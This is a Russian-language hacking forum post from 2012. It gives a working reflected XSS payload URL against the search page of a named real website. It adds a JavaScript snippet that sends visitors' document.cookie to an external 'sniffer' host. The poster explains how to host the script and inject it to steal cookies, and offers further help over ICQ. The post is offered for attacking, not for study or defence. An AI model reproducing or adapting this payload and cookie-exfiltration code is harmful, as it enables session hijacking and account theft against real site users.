11.01.2012, 01:00
|
|
Познающий
Регистрация: 18.04.2011
Сообщений: 73
С нами:
7931126
Репутация:
13
|
|
Постараюсь вам помочь(каждому)
В поиске на том сайте есть пассинвая xss, активку я искать не стал хотя там она тоже есть.Ну так вот,
code:
http://goths.ru/search.php?domains=goths.ru&q=%22%3E%3Cscript%3Eal ert%280%29%3C%2Fscript%3E&sitesearch=goths.ru&sa=
Это пассивная xss, для того чтобы заточить на сниффер нужно воспользоваться JS.
source:
Код:
img
= new Image()
; img.src = 'http://snifer.ru/s.php?'+document.cookie;
Это примерно как выглядит Js изнутри
Ты должен изменить слово snifer на свой и залить этот код как фаил Js
Примерно так snifer.ru/js.js.
После делаеш так
code:
В поиске и всё.
Если ничего не понел,пиши В icq
m744na у тебя всё проще, тебе надо на сайте найти сначала xss уязвимость,ибо обычной картинкой не увести куков. |
|
|